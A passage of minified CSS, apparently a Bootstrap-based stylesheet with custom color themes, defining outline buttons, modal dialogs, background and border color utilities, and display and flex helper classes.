rgba(0,0,0,.5)}.btn-outline-darkgrey{color:#221f1f;border-color:#221f1f}.btn-outline-darkgrey:hover{color:#fff;background-color:#221f1f;border-color:#221f1f}.btn-outline-darkgrey:focus,.btn-outline-darkgrey.focus{box-shadow:0 0 0 .2rem rgba(34,31,31,.5)}.btn-outline-darkgrey.disabled,.btn-outline-darkgrey:disabled{color:#221f1f;background-color:rgba(0,0,0,0)}.btn-outline-darkgrey:not(:disabled):not(.disabled):active,.btn-outline-darkgrey:not(:disabled):not(.disabled).active,.show>.btn-outline-darkgrey.dropdown-toggle{color:#fff;background-color:#221f1f;border-color:#221f1f}.btn-outline-darkgrey:not(:disabled):not(.disabled):active:focus,.btn-outline-darkgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-darkgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(34,31,31,.5)}.btn-outline-sublime{color:#2a303c;border-color:#2a303c}.btn-outline-sublime:hover{color:#fff;background-color:#2a303c;border-color:#2a303c}.btn-outline-sublime:focus,.btn-outline-sublime.focus{box-shadow:0 0 0 .2rem rgba(42,48,60,.5)}.btn-outline-sublime.disabled,.btn-outline-sublime:disabled{color:#2a303c;background-color:rgba(0,0,0,0)}.btn-outline-sublime:not(:disabled):not(.disabled):active,.btn-outline-sublime:not(:disabled):not(.disabled).active,.show>.btn-outline-sublime.dropdown-toggle{color:#fff;background-color:#2a303c;border-color:#2a303c}.btn-outline-sublime:not(:disabled):not(.disabled):active:focus,.btn-outline-sublime:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-sublime.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(42,48,60,.5)}.btn-outline-neongreen{color:#2eda6b;border-color:#2eda6b}.btn-outline-neongreen:hover{color:#212529;background-color:#2eda6b;border-color:#2eda6b}.btn-outline-neongreen:focus,.btn-outline-neongreen.focus{box-shadow:0 0 0 .2rem rgba(46,218,107,.5)}.btn-outline-neongreen.disabled,.btn-outline-neongreen:disabled{color:#2eda6b;background-color:rgba(0,0,0,0)}.btn-outline-neongreen:not(:disabled):not(.disabled):active,.btn-outline-neongreen:not(:disabled):not(.disabled).active,.show>.btn-outline-neongreen.dropdown-toggle{color:#212529;background-color:#2eda6b;border-color:#2eda6b}.btn-outline-neongreen:not(:disabled):not(.disabled):active:focus,.btn-outline-neongreen:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-neongreen.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(46,218,107,.5)}.btn-outline-milka{color:#b996f7;border-color:#b996f7}.btn-outline-milka:hover{color:#212529;background-color:#b996f7;border-color:#b996f7}.btn-outline-milka:focus,.btn-outline-milka.focus{box-shadow:0 0 0 .2rem rgba(185,150,247,.5)}.btn-outline-milka.disabled,.btn-outline-milka:disabled{color:#b996f7;background-color:rgba(0,0,0,0)}.btn-outline-milka:not(:disabled):not(.disabled):active,.btn-outline-milka:not(:disabled):not(.disabled).active,.show>.btn-outline-milka.dropdown-toggle{color:#212529;background-color:#b996f7;border-color:#b996f7}.btn-outline-milka:not(:disabled):not(.disabled):active:focus,.btn-outline-milka:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-milka.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(185,150,247,.5)}.btn-outline-lightgray{color:#f9f9f9;border-color:#f9f9f9}.btn-outline-lightgray:hover{color:#212529;background-color:#f9f9f9;border-color:#f9f9f9}.btn-outline-lightgray:focus,.btn-outline-lightgray.focus{box-shadow:0 0 0 .2rem rgba(249,249,249,.5)}.btn-outline-lightgray.disabled,.btn-outline-lightgray:disabled{color:#f9f9f9;background-color:rgba(0,0,0,0)}.btn-outline-lightgray:not(:disabled):not(.disabled):active,.btn-outline-lightgray:not(:disabled):not(.disabled).active,.show>.btn-outline-lightgray.dropdown-toggle{color:#212529;background-color:#f9f9f9;border-color:#f9f9f9}.btn-outline-lightgray:not(:disabled):not(.disabled):active:focus,.btn-outline-lightgray:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-lightgray.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(249,249,249,.5)}.btn-outline-gradientyellow{color:#ffed2a;border-color:#ffed2a}.btn-outline-gradientyellow:hover{color:#212529;background-color:#ffed2a;border-color:#ffed2a}.btn-outline-gradientyellow:focus,.btn-outline-gradientyellow.focus{box-shadow:0 0 0 .2rem rgba(255,237,42,.5)}.btn-outline-gradientyellow.disabled,.btn-outline-gradientyellow:disabled{color:#ffed2a;background-color:rgba(0,0,0,0)}.btn-outline-gradientyellow:not(:disabled):not(.disabled):active,.btn-outline-gradientyellow:not(:disabled):not(.disabled).active,.show>.btn-outline-gradientyellow.dropdown-toggle{color:#212529;background-color:#ffed2a;border-color:#ffed2a}.btn-outline-gradientyellow:not(:disabled):not(.disabled):active:focus,.btn-outline-gradientyellow:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-gradientyellow.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(255,237,42,.5)}.btn-outline-gradientblue{color:#c0fff8;border-color:#c0fff8}.btn-outline-gradientblue:hover{color:#212529;background-color:#c0fff8;border-color:#c0fff8}.btn-outline-gradientblue:focus,.btn-outline-gradientblue.focus{box-shadow:0 0 0 .2rem rgba(192,255,248,.5)}.btn-outline-gradientblue.disabled,.btn-outline-gradientblue:disabled{color:#c0fff8;background-color:rgba(0,0,0,0)}.btn-outline-gradientblue:not(:disabled):not(.disabled):active,.btn-outline-gradientblue:not(:disabled):not(.disabled).active,.show>.btn-outline-gradientblue.dropdown-toggle{color:#212529;background-color:#c0fff8;border-color:#c0fff8}.btn-outline-gradientblue:not(:disabled):not(.disabled):active:focus,.btn-outline-gradientblue:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-gradientblue.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(192,255,248,.5)}.btn-outline-ftimes{color:#fff1e5;border-color:#fff1e5}.btn-outline-ftimes:hover{color:#212529;background-color:#fff1e5;border-color:#fff1e5}.btn-outline-ftimes:focus,.btn-outline-ftimes.focus{box-shadow:0 0 0 .2rem rgba(255,241,229,.5)}.btn-outline-ftimes.disabled,.btn-outline-ftimes:disabled{color:#fff1e5;background-color:rgba(0,0,0,0)}.btn-outline-ftimes:not(:disabled):not(.disabled):active,.btn-outline-ftimes:not(:disabled):not(.disabled).active,.show>.btn-outline-ftimes.dropdown-toggle{color:#212529;background-color:#fff1e5;border-color:#fff1e5}.btn-outline-ftimes:not(:disabled):not(.disabled):active:focus,.btn-outline-ftimes:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-ftimes.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(255,241,229,.5)}.btn-outline-planfree{color:#ffdabb;border-color:#ffdabb}.btn-outline-planfree:hover{color:#212529;background-color:#ffdabb;border-color:#ffdabb}.btn-outline-planfree:focus,.btn-outline-planfree.focus{box-shadow:0 0 0 .2rem rgba(255,218,187,.5)}.btn-outline-planfree.disabled,.btn-outline-planfree:disabled{color:#ffdabb;background-color:rgba(0,0,0,0)}.btn-outline-planfree:not(:disabled):not(.disabled):active,.btn-outline-planfree:not(:disabled):not(.disabled).active,.show>.btn-outline-planfree.dropdown-toggle{color:#212529;background-color:#ffdabb;border-color:#ffdabb}.btn-outline-planfree:not(:disabled):not(.disabled):active:focus,.btn-outline-planfree:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-planfree.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(255,218,187,.5)}.btn-outline-legalnotepad{color:#fef6d8;border-color:#fef6d8}.btn-outline-legalnotepad:hover{color:#212529;background-color:#fef6d8;border-color:#fef6d8}.btn-outline-legalnotepad:focus,.btn-outline-legalnotepad.focus{box-shadow:0 0 0 .2rem rgba(254,246,216,.5)}.btn-outline-legalnotepad.disabled,.btn-outline-legalnotepad:disabled{color:#fef6d8;background-color:rgba(0,0,0,0)}.btn-outline-legalnotepad:not(:disabled):not(.disabled):active,.btn-outline-legalnotepad:not(:disabled):not(.disabled).active,.show>.btn-outline-legalnotepad.dropdown-toggle{color:#212529;background-color:#fef6d8;border-color:#fef6d8}.btn-outline-legalnotepad:not(:disabled):not(.disabled):active:focus,.btn-outline-legalnotepad:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-legalnotepad.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(254,246,216,.5)}.btn-outline-excel{color:#0f9d58;border-color:#0f9d58}.btn-outline-excel:hover{color:#fff;background-color:#0f9d58;border-color:#0f9d58}.btn-outline-excel:focus,.btn-outline-excel.focus{box-shadow:0 0 0 .2rem rgba(15,157,88,.5)}.btn-outline-excel.disabled,.btn-outline-excel:disabled{color:#0f9d58;background-color:rgba(0,0,0,0)}.btn-outline-excel:not(:disabled):not(.disabled):active,.btn-outline-excel:not(:disabled):not(.disabled).active,.show>.btn-outline-excel.dropdown-toggle{color:#fff;background-color:#0f9d58;border-color:#0f9d58}.btn-outline-excel:not(:disabled):not(.disabled):active:focus,.btn-outline-excel:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-excel.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(15,157,88,.5)}.btn-outline-changelog{color:#47525d;border-color:#47525d}.btn-outline-changelog:hover{color:#fff;background-color:#47525d;border-color:#47525d}.btn-outline-changelog:focus,.btn-outline-changelog.focus{box-shadow:0 0 0 .2rem rgba(71,82,93,.5)}.btn-outline-changelog.disabled,.btn-outline-changelog:disabled{color:#47525d;background-color:rgba(0,0,0,0)}.btn-outline-changelog:not(:disabled):not(.disabled):active,.btn-outline-changelog:not(:disabled):not(.disabled).active,.show>.btn-outline-changelog.dropdown-toggle{color:#fff;background-color:#47525d;border-color:#47525d}.btn-outline-changelog:not(:disabled):not(.disabled):active:focus,.btn-outline-changelog:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-changelog.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(71,82,93,.5)}.btn-outline-pdfred{color:#e7505a;border-color:#e7505a}.btn-outline-pdfred:hover{color:#fff;background-color:#e7505a;border-color:#e7505a}.btn-outline-pdfred:focus,.btn-outline-pdfred.focus{box-shadow:0 0 0 .2rem rgba(231,80,90,.5)}.btn-outline-pdfred.disabled,.btn-outline-pdfred:disabled{color:#e7505a;background-color:rgba(0,0,0,0)}.btn-outline-pdfred:not(:disabled):not(.disabled):active,.btn-outline-pdfred:not(:disabled):not(.disabled).active,.show>.btn-outline-pdfred.dropdown-toggle{color:#fff;background-color:#e7505a;border-color:#e7505a}.btn-outline-pdfred:not(:disabled):not(.disabled):active:focus,.btn-outline-pdfred:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-pdfred.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(231,80,90,.5)}.btn-outline-mediumgrey{color:#c1c1c1;border-color:#c1c1c1}.btn-outline-mediumgrey:hover{color:#212529;background-color:#c1c1c1;border-color:#c1c1c1}.btn-outline-mediumgrey:focus,.btn-outline-mediumgrey.focus{box-shadow:0 0 0 .2rem rgba(193,193,193,.5)}.btn-outline-mediumgrey.disabled,.btn-outline-mediumgrey:disabled{color:#c1c1c1;background-color:rgba(0,0,0,0)}.btn-outline-mediumgrey:not(:disabled):not(.disabled):active,.btn-outline-mediumgrey:not(:disabled):not(.disabled).active,.show>.btn-outline-mediumgrey.dropdown-toggle{color:#212529;background-color:#c1c1c1;border-color:#c1c1c1}.btn-outline-mediumgrey:not(:disabled):not(.disabled):active:focus,.btn-outline-mediumgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-mediumgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(193,193,193,.5)}.btn-outline-paypal{color:#009cde;border-color:#009cde}.btn-outline-paypal:hover{color:#fff;background-color:#009cde;border-color:#009cde}.btn-outline-paypal:focus,.btn-outline-paypal.focus{box-shadow:0 0 0 .2rem rgba(0,156,222,.5)}.btn-outline-paypal.disabled,.btn-outline-paypal:disabled{color:#009cde;background-color:rgba(0,0,0,0)}.btn-outline-paypal:not(:disabled):not(.disabled):active,.btn-outline-paypal:not(:disabled):not(.disabled).active,.show>.btn-outline-paypal.dropdown-toggle{color:#fff;background-color:#009cde;border-color:#009cde}.btn-outline-paypal:not(:disabled):not(.disabled):active:focus,.btn-outline-paypal:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-paypal.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(0,156,222,.5)}.btn-outline-newdarkgrey{color:#a6abad;border-color:#a6abad}.btn-outline-newdarkgrey:hover{color:#212529;background-color:#a6abad;border-color:#a6abad}.btn-outline-newdarkgrey:focus,.btn-outline-newdarkgrey.focus{box-shadow:0 0 0 .2rem rgba(166,171,173,.5)}.btn-outline-newdarkgrey.disabled,.btn-outline-newdarkgrey:disabled{color:#a6abad;background-color:rgba(0,0,0,0)}.btn-outline-newdarkgrey:not(:disabled):not(.disabled):active,.btn-outline-newdarkgrey:not(:disabled):not(.disabled).active,.show>.btn-outline-newdarkgrey.dropdown-toggle{color:#212529;background-color:#a6abad;border-color:#a6abad}.btn-outline-newdarkgrey:not(:disabled):not(.disabled):active:focus,.btn-outline-newdarkgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-newdarkgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(166,171,173,.5)}.btn-link{font-weight:400;color:#1fbbff;text-decoration:none}.btn-link:hover{color:#0092d2;text-decoration:underline}.btn-link:focus,.btn-link.focus{text-decoration:underline}.btn-link:disabled,.btn-link.disabled{color:#6c757d;pointer-events:none}.btn-lg{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.btn-sm{padding:.25rem .5rem;font-size:0.875rem;line-height:1.5;border-radius:.2rem}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:.5rem}input[type=submit].btn-block,input[type=reset].btn-block,input[type=button].btn-block{width:100%}*,*::before,*::after{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:rgba(0,0,0,0)}article,aside,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus:not(:focus-visible){outline:0 !important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[title],abbr[data-original-title]{text-decoration:underline;text-decoration:underline dotted;cursor:help;border-bottom:0;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}ol,ul,dl{margin-top:0;margin-bottom:1rem}ol ol,ul ul,ol ul,ul ol{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}a{color:#1fbbff;text-decoration:none;background-color:rgba(0,0,0,0)}a:hover{color:#0092d2;text-decoration:underline}a:not([href]){color:inherit;text-decoration:none}a:not([href]):hover{color:inherit;text-decoration:none}pre,code,kbd,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;font-size:1em}pre{margin-top:0;margin-bottom:1rem;overflow:auto;-ms-overflow-style:scrollbar}figure{margin:0 0 1rem}img{vertical-align:middle;border-style:none}svg{overflow:hidden;vertical-align:middle}table{border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#6c757d;text-align:left;caption-side:bottom}th{text-align:inherit}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}input,button,select,optgroup,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button:not(:disabled),[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled){cursor:pointer}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{padding:0;border-style:none}input[type=radio],input[type=checkbox]{box-sizing:border-box;padding:0}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:none}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none !important}.modal-open{overflow:hidden}.modal-open .modal{overflow-x:hidden;overflow-y:auto}.modal{position:fixed;top:0;left:0;z-index:1050;display:none;width:100%;height:100%;overflow:hidden;outline:0}.modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none}.modal.fade .modal-dialog{transition:transform .3s ease-out;transform:translate(0, -50px)}@media(prefers-reduced-motion: reduce){.modal.fade .modal-dialog{transition:none}}.modal.show .modal-dialog{transform:none}.modal.modal-static .modal-dialog{transform:scale(1.02)}.modal-dialog-scrollable{display:flex;max-height:calc(100% - 1rem)}.modal-dialog-scrollable .modal-content{max-height:calc(100vh - 1rem);overflow:hidden}.modal-dialog-scrollable .modal-header,.modal-dialog-scrollable .modal-footer{flex-shrink:0}.modal-dialog-scrollable .modal-body{overflow-y:auto}.modal-dialog-centered{display:flex;align-items:center;min-height:calc(100% - 1rem)}.modal-dialog-centered::before{display:block;height:calc(100vh - 1rem);height:min-content;content:""}.modal-dialog-centered.modal-dialog-scrollable{flex-direction:column;justify-content:center;height:100%}.modal-dialog-centered.modal-dialog-scrollable .modal-content{max-height:none}.modal-dialog-centered.modal-dialog-scrollable::before{content:none}.modal-content{position:relative;display:flex;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem;outline:0}.modal-backdrop{position:fixed;top:0;left:0;z-index:1040;width:100vw;height:100vh;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop.show{opacity:.5}.modal-header{display:flex;align-items:flex-start;justify-content:space-between;padding:1rem 1rem;border-bottom:1px solid #dee2e6;border-top-left-radius:calc(0.3rem - 1px);border-top-right-radius:calc(0.3rem - 1px)}.modal-header .close{padding:1rem 1rem;margin:-1rem -1rem -1rem auto}.modal-title{margin-bottom:0;line-height:1.5}.modal-body{position:relative;flex:1 1 auto;padding:1rem}.modal-footer{display:flex;flex-wrap:wrap;align-items:center;justify-content:flex-end;padding:.75rem;border-top:1px solid #dee2e6;border-bottom-right-radius:calc(0.3rem - 1px);border-bottom-left-radius:calc(0.3rem - 1px)}.modal-footer>*{margin:.25rem}.modal-scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}@media(min-width: 576px){.modal-dialog{max-width:500px;margin:1.75rem auto}.modal-dialog-scrollable{max-height:calc(100% - 3.5rem)}.modal-dialog-scrollable .modal-content{max-height:calc(100vh - 3.5rem)}.modal-dialog-centered{min-height:calc(100% - 3.5rem)}.modal-dialog-centered::before{height:calc(100vh - 3.5rem);height:min-content}.modal-sm{max-width:300px}}@media(min-width: 992px){.modal-lg,.modal-xl{max-width:800px}}@media(min-width: 1200px){.modal-xl{max-width:1140px}}.align-baseline{vertical-align:baseline !important}.align-top{vertical-align:top !important}.align-middle{vertical-align:middle !important}.align-bottom{vertical-align:bottom !important}.align-text-bottom{vertical-align:text-bottom !important}.align-text-top{vertical-align:text-top !important}.bg-primary{background-color:#1fbbff !important}a.bg-primary:hover,a.bg-primary:focus,button.bg-primary:hover,button.bg-primary:focus{background-color:#00a4eb !important}.bg-secondary{background-color:#888 !important}a.bg-secondary:hover,a.bg-secondary:focus,button.bg-secondary:hover,button.bg-secondary:focus{background-color:#6f6f6f !important}.bg-success{background-color:#28a745 !important}a.bg-success:hover,a.bg-success:focus,button.bg-success:hover,button.bg-success:focus{background-color:#1e7e34 !important}.bg-info{background-color:#17a2b8 !important}a.bg-info:hover,a.bg-info:focus,button.bg-info:hover,button.bg-info:focus{background-color:#117a8b !important}.bg-warning{background-color:#ffc107 !important}a.bg-warning:hover,a.bg-warning:focus,button.bg-warning:hover,button.bg-warning:focus{background-color:#d39e00 !important}.bg-danger{background-color:#dc3545 !important}a.bg-danger:hover,a.bg-danger:focus,button.bg-danger:hover,button.bg-danger:focus{background-color:#bd2130 !important}.bg-light{background-color:#fcf8f4 !important}a.bg-light:hover,a.bg-light:focus,button.bg-light:hover,button.bg-light:focus{background-color:#f1dfcc !important}.bg-dark{background-color:#343a40 !important}a.bg-dark:hover,a.bg-dark:focus,button.bg-dark:hover,button.bg-dark:focus{background-color:#1d2124 !important}.bg-black{background-color:#000 !important}a.bg-black:hover,a.bg-black:focus,button.bg-black:hover,button.bg-black:focus{background-color:#000 !important}.bg-darkgrey{background-color:#221f1f !important}a.bg-darkgrey:hover,a.bg-darkgrey:focus,button.bg-darkgrey:hover,button.bg-darkgrey:focus{background-color:#070707 !important}.bg-sublime{background-color:#2a303c !important}a.bg-sublime:hover,a.bg-sublime:focus,button.bg-sublime:hover,button.bg-sublime:focus{background-color:#15181e !important}.bg-neongreen{background-color:#2eda6b !important}a.bg-neongreen:hover,a.bg-neongreen:focus,button.bg-neongreen:hover,button.bg-neongreen:focus{background-color:#20b555 !important}.bg-milka{background-color:#b996f7 !important}a.bg-milka:hover,a.bg-milka:focus,button.bg-milka:hover,button.bg-milka:focus{background-color:#9967f3 !important}.bg-lightgray{background-color:#f9f9f9 !important}a.bg-lightgray:hover,a.bg-lightgray:focus,button.bg-lightgray:hover,button.bg-lightgray:focus{background-color:#e0e0e0 !important}.bg-gradientyellow{background-color:#ffed2a !important}a.bg-gradientyellow:hover,a.bg-gradientyellow:focus,button.bg-gradientyellow:hover,button.bg-gradientyellow:focus{background-color:#f6e100 !important}.bg-gradientblue{background-color:#c0fff8 !important}a.bg-gradientblue:hover,a.bg-gradientblue:focus,button.bg-gradientblue:hover,button.bg-gradientblue:focus{background-color:#8dfff2 !important}.bg-ftimes{background-color:#fff1e5 !important}a.bg-ftimes:hover,a.bg-ftimes:focus,button.bg-ftimes:hover,button.bg-ftimes:focus{background-color:#ffd6b2 !important}.bg-planfree{background-color:#ffdabb !important}a.bg-planfree:hover,a.bg-planfree:focus,button.bg-planfree:hover,button.bg-planfree:focus{background-color:#ffbe88 !important}.bg-legalnotepad{background-color:#fef6d8 !important}a.bg-legalnotepad:hover,a.bg-legalnotepad:focus,button.bg-legalnotepad:hover,button.bg-legalnotepad:focus{background-color:#fdeba6 !important}.bg-excel{background-color:#0f9d58 !important}a.bg-excel:hover,a.bg-excel:focus,button.bg-excel:hover,button.bg-excel:focus{background-color:#0b6e3e !important}.bg-changelog{background-color:#47525d !important}a.bg-changelog:hover,a.bg-changelog:focus,button.bg-changelog:hover,button.bg-changelog:focus{background-color:#313940 !important}.bg-pdfred{background-color:#e7505a !important}a.bg-pdfred:hover,a.bg-pdfred:focus,button.bg-pdfred:hover,button.bg-pdfred:focus{background-color:#e12330 !important}.bg-mediumgrey{background-color:#c1c1c1 !important}a.bg-mediumgrey:hover,a.bg-mediumgrey:focus,button.bg-mediumgrey:hover,button.bg-mediumgrey:focus{background-color:#a8a8a8 !important}.bg-paypal{background-color:#009cde !important}a.bg-paypal:hover,a.bg-paypal:focus,button.bg-paypal:hover,button.bg-paypal:focus{background-color:#0078ab !important}.bg-newdarkgrey{background-color:#a6abad !important}a.bg-newdarkgrey:hover,a.bg-newdarkgrey:focus,button.bg-newdarkgrey:hover,button.bg-newdarkgrey:focus{background-color:#8b9295 !important}.bg-white{background-color:#fff !important}.bg-transparent{background-color:rgba(0,0,0,0) !important}.border{border:1px solid #dee2e6 !important}.border-top{border-top:1px solid #dee2e6 !important}.border-right{border-right:1px solid #dee2e6 !important}.border-bottom{border-bottom:1px solid #dee2e6 !important}.border-left{border-left:1px solid #dee2e6 !important}.border-0{border:0 !important}.border-top-0{border-top:0 !important}.border-right-0{border-right:0 !important}.border-bottom-0{border-bottom:0 !important}.border-left-0{border-left:0 !important}.border-primary{border-color:#1fbbff !important}.border-secondary{border-color:#888 !important}.border-success{border-color:#28a745 !important}.border-info{border-color:#17a2b8 !important}.border-warning{border-color:#ffc107 !important}.border-danger{border-color:#dc3545 !important}.border-light{border-color:#fcf8f4 !important}.border-dark{border-color:#343a40 !important}.border-black{border-color:#000 !important}.border-darkgrey{border-color:#221f1f !important}.border-sublime{border-color:#2a303c !important}.border-neongreen{border-color:#2eda6b !important}.border-milka{border-color:#b996f7 !important}.border-lightgray{border-color:#f9f9f9 !important}.border-gradientyellow{border-color:#ffed2a !important}.border-gradientblue{border-color:#c0fff8 !important}.border-ftimes{border-color:#fff1e5 !important}.border-planfree{border-color:#ffdabb !important}.border-legalnotepad{border-color:#fef6d8 !important}.border-excel{border-color:#0f9d58 !important}.border-changelog{border-color:#47525d !important}.border-pdfred{border-color:#e7505a !important}.border-mediumgrey{border-color:#c1c1c1 !important}.border-paypal{border-color:#009cde !important}.border-newdarkgrey{border-color:#a6abad !important}.border-white{border-color:#fff !important}.rounded-sm{border-radius:.2rem !important}.rounded{border-radius:.25rem !important}.rounded-top{border-top-left-radius:.25rem !important;border-top-right-radius:.25rem !important}.rounded-right{border-top-right-radius:.25rem !important;border-bottom-right-radius:.25rem !important}.rounded-bottom{border-bottom-right-radius:.25rem !important;border-bottom-left-radius:.25rem !important}.rounded-left{border-top-left-radius:.25rem !important;border-bottom-left-radius:.25rem !important}.rounded-lg{border-radius:.3rem !important}.rounded-circle{border-radius:50% !important}.rounded-pill{border-radius:50rem !important}.rounded-0{border-radius:0 !important}.clearfix::after{display:block;clear:both;content:""}.d-none{display:none !important}.d-inline{display:inline !important}.d-inline-block{display:inline-block !important}.d-block{display:block !important}.d-table{display:table !important}.d-table-row{display:table-row !important}.d-table-cell{display:table-cell !important}.d-flex{display:flex !important}.d-inline-flex{display:inline-flex !important}@media(min-width: 576px){.d-sm-none{display:none !important}.d-sm-inline{display:inline !important}.d-sm-inline-block{display:inline-block !important}.d-sm-block{display:block !important}.d-sm-table{display:table !important}.d-sm-table-row{display:table-row !important}.d-sm-table-cell{display:table-cell !important}.d-sm-flex{display:flex !important}.d-sm-inline-flex{display:inline-flex !important}}@media(min-width: 768px){.d-md-none{display:none !important}.d-md-inline{display:inline !important}.d-md-inline-block{display:inline-block !important}.d-md-block{display:block !important}.d-md-table{display:table !important}.d-md-table-row{display:table-row !important}.d-md-table-cell{display:table-cell !important}.d-md-flex{display:flex !important}.d-md-inline-flex{display:inline-flex !important}}@media(min-width: 992px){.d-lg-none{display:none !important}.d-lg-inline{display:inline !important}.d-lg-inline-block{display:inline-block !important}.d-lg-block{display:block !important}.d-lg-table{display:table !important}.d-lg-table-row{display:table-row !important}.d-lg-table-cell{display:table-cell !important}.d-lg-flex{display:flex !important}.d-lg-inline-flex{display:inline-flex !important}}@media(min-width: 1200px){.d-xl-none{display:none !important}.d-xl-inline{display:inline !important}.d-xl-inline-block{display:inline-block !important}.d-xl-block{display:block !important}.d-xl-table{display:table !important}.d-xl-table-row{display:table-row !important}.d-xl-table-cell{display:table-cell !important}.d-xl-flex{display:flex !important}.d-xl-inline-flex{display:inline-flex !important}}@media print{.d-print-none{display:none !important}.d-print-inline{display:inline !important}.d-print-inline-block{display:inline-block !important}.d-print-block{display:block !important}.d-print-table{display:table !important}.d-print-table-row{display:table-row !important}.d-print-table-cell{display:table-cell !important}.d-print-flex{display:flex !important}.d-print-inline-flex{display:inline-flex !important}}.embed-responsive{position:relative;display:block;width:100%;padding:0;overflow:hidden}.embed-responsive::before{display:block;content:""}.embed-responsive .embed-responsive-item,.embed-responsive iframe,.embed-responsive embed,.embed-responsive object,.embed-responsive video{position:absolute;top:0;bottom:0;left:0;width:100%;height:100%;border:0}.embed-responsive-21by9::before{padding-top:42.8571428571%}.embed-responsive-16by9::before{padding-top:56.25%}.embed-responsive-4by3::before{padding-top:75%}.embed-responsive-1by1::before{padding-top:100%}.flex-row{flex-direction:row !important}.flex-column{flex-direction:column !important}.flex-row-reverse{flex-direction:row-reverse !important}.flex-column-reverse{flex-direction:column-reverse !important}.flex-wrap{flex-wrap:wrap !important}.flex-nowrap{flex-wrap:nowrap !important}.flex-wrap-reverse{flex-wrap:wrap-reverse !important}.flex-fill{flex:1 1 auto !important}.flex-grow-0{flex-grow:0 !important}.flex-grow-1{flex-grow:1 !important}.flex-shrink-0{flex-shrink:0 !important}.flex-shrink-1{flex-shrink:1 !important}.justify-content-start{justify-content:flex-start !important}.justify-content-end{justify-content:flex-end !important}.justify-content-center{justify-content:center !important}.justify-content-between{justify-content:space-between !important}.justify-content-around{justify-content:space-around !important}.align-items-start{align-items:flex-start !important}.align-items-end{align-items:flex-end !important}.align-items-center{align-items:center !important}.align-items-baseline{align-items:baseline !important}.align-items-stretch{align-items:stretch !important}.align-content-start{align-content:flex-start !important}.align-content-end{align-content:flex-end !important}.align-content-center{align-content:center !important}.align-content-between{align-content:space-between !important}.align-content-around{align-content:space-around !important}.align-content-stretch{align-content:stretch !important}.align-self-auto{align-self:auto 